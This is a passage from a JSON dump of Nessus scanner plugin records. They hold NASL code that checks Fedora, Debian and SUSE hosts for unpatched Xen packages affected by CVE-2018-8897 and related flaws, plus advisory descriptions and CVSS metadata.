flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-hypervisor-4.8-amd64\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-hypervisor-4.8-arm64\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-hypervisor-4.8-armhf\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-system-amd64\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-system-arm64\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-system-armhf\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-utils-4.8\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-utils-common\", 
reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xenstore-utils\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:20:32", "description": "x86: mishandling of debug exceptions [XSA-260, CVE-2018-8897] x86\nvHPET interrupt injection errors [XSA-261] (#1576089) qemu may drive\nXen into unbounded loop [XSA-262]\n\n----\n\nupdate to xen-4.10.1\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 11, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "title": "Fedora 28 : xen (2018-a7ac26523d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "modified": "2019-01-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-A7AC26523D.NASL", "href": "https://www.tenable.com/plugins/nessus/120686", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-a7ac26523d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120686);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-8897\");\n script_xref(name:\"FEDORA\", 
value:\"2018-a7ac26523d\");\n\n script_name(english:\"Fedora 28 : xen (2018-a7ac26523d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"x86: mishandling of debug exceptions [XSA-260, CVE-2018-8897] x86\nvHPET interrupt injection errors [XSA-261] (#1576089) qemu may drive\nXen into unbounded loop [XSA-262]\n\n----\n\nupdate to xen-4.10.1\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-a7ac26523d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8897\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"xen-4.10.1-2.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:19:55", "description": "x86: mishandling of debug exceptions [XSA-260, CVE-2018-8897] x86\nvHPET interrupt injection errors [XSA-261] (#1576089) qemu may drive\nXen into unbounded loop [XSA-262]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 21, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-17T00:00:00", "title": "Fedora 27 : xen (2018-98684f429b)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "modified": "2018-05-17T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:xen"], "id": "FEDORA_2018-98684F429B.NASL", "href": "https://www.tenable.com/plugins/nessus/109875", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
FEDORA-2018-98684f429b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109875);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-8897\");\n script_xref(name:\"FEDORA\", value:\"2018-98684f429b\");\n\n script_name(english:\"Fedora 27 : xen (2018-98684f429b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"x86: mishandling of debug exceptions [XSA-260, CVE-2018-8897] x86\nvHPET interrupt injection errors [XSA-261] (#1576089) qemu may drive\nXen into unbounded loop [XSA-262]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-98684f429b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation 
Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"xen-4.9.2-3.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:18:57", "description": "x86: mishandling of debug exceptions [XSA-260, CVE-2018-8897] x86\nvHPET interrupt injection errors [XSA-261, CVE-2018-10982] (#1576089)\nqemu may drive Xen into unbounded loop [XSA-262, CVE-2018-10981]\n(#1576680)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 21, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-29T00:00:00", "title": "Fedora 26 : xen (2018-7cd077ddd3)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "modified": "2018-05-29T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-7CD077DDD3.NASL", "href": "https://www.tenable.com/plugins/nessus/110169", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora 
Security Advisory FEDORA-2018-7cd077ddd3.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110169);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-8897\");\n script_xref(name:\"FEDORA\", value:\"2018-7cd077ddd3\");\n\n script_name(english:\"Fedora 26 : xen (2018-7cd077ddd3)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"x86: mishandling of debug exceptions [XSA-260, CVE-2018-8897] x86\nvHPET interrupt injection errors [XSA-261, CVE-2018-10982] (#1576089)\nqemu may drive Xen into unbounded loop [XSA-262, CVE-2018-10981]\n(#1576680)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-7cd077ddd3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", 
value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"xen-4.8.3-5.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:39:15", "description": "Multiple vulnerabilities have been discovered in the Xen hypervisor,\nwhich could result in denial of service, information leaks or\nprivilege escalation.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.1.6.lts1-14.\n\nWe recommend that you upgrade your xen packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 17, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-29T00:00:00", "title": "Debian DLA-1383-1 : xen security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "modified": "2018-05-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:xen-hypervisor-4.1-amd64", "p-cpe:/a:debian:debian_linux:xen-system-i386", "p-cpe:/a:debian:debian_linux:xen-utils-4.1", "p-cpe:/a:debian:debian_linux:xen-system-amd64", "p-cpe:/a:debian:debian_linux:xenstore-utils", "p-cpe:/a:debian:debian_linux:xen-docs-4.1", "p-cpe:/a:debian:debian_linux:libxen-ocaml", "p-cpe:/a:debian:debian_linux:libxen-ocaml-dev", "p-cpe:/a:debian:debian_linux:libxenstore3.0", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:xen-hypervisor-4.1-i386", "p-cpe:/a:debian:debian_linux:xen-utils-common", "p-cpe:/a:debian:debian_linux:libxen-dev", "p-cpe:/a:debian:debian_linux:libxen-4.1"], "id": "DEBIAN_DLA-1383.NASL", "href": "https://www.tenable.com/plugins/nessus/110159", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1383-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110159);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-8897\");\n\n script_name(english:\"Debian DLA-1383-1 : xen security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been discovered in the Xen hypervisor,\nwhich could result in denial of service, information leaks or\nprivilege escalation.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.1.6.lts1-14.\n\nWe recommend that you upgrade your xen packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/05/msg00015.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/xen\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxen-4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxen-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxen-ocaml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxen-ocaml-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxenstore3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-docs-4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-hypervisor-4.1-amd64\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:xen-hypervisor-4.1-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-system-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-system-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-utils-4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-utils-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xenstore-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libxen-4.1\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxen-dev\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxen-ocaml\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxen-ocaml-dev\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxenstore3.0\", 
reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xen-docs-4.1\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xen-hypervisor-4.1-amd64\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xen-hypervisor-4.1-i386\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xen-system-amd64\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xen-system-i386\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xen-utils-4.1\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xen-utils-common\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xenstore-utils\", reference:\"4.1.6.lts1-14\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T06:49:13", "description": "This update for xen fixes several issues.\n\nThese security issues were fixed :\n\nCVE-2018-8897: Prevent mishandling of debug exceptions on x86\n(XSA-260, bsc#1090820)\n\nHandle HPET timers in IO-APIC mode correctly to prevent malicious or\nbuggy HVM guests from causing a hypervisor crash or potentially\nprivilege escalation/information leaks (XSA-261, bsc#1090822)\n\nPrevent unbounded loop, induced by qemu allowing an attacker to\npermanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n\nCVE-2018-10472: x86 HVM guest OS users (in certain configurations)\nwere able to read arbitrary dom0 files via QMP live insertion of a\nCDROM, in conjunction with specifying the target file as the backing\nfile of a snapshot (bsc#1089152).\n\nCVE-2018-10471: x86 PV guest OS users were able to cause a denial of\nservice (out-of-bounds zero write and hypervisor 
crash) via unexpected\nINT 80 processing, because of an incorrect fix for CVE-2017-5754\n(bsc#1089635).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-22T00:00:00", "title": "SUSE SLES12 Security Update : xen (SUSE-SU-2018:3230-1) (Meltdown)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:xen-tools-debuginfo", "p-cpe:/a:novell:suse_linux:xen-doc-html", "p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo", "p-cpe:/a:novell:suse_linux:xen-debugsource", "p-cpe:/a:novell:suse_linux:xen-tools-domU", "p-cpe:/a:novell:suse_linux:xen-libs-debuginfo", "p-cpe:/a:novell:suse_linux:xen-libs", "p-cpe:/a:novell:suse_linux:xen", "p-cpe:/a:novell:suse_linux:xen-tools"], "id": 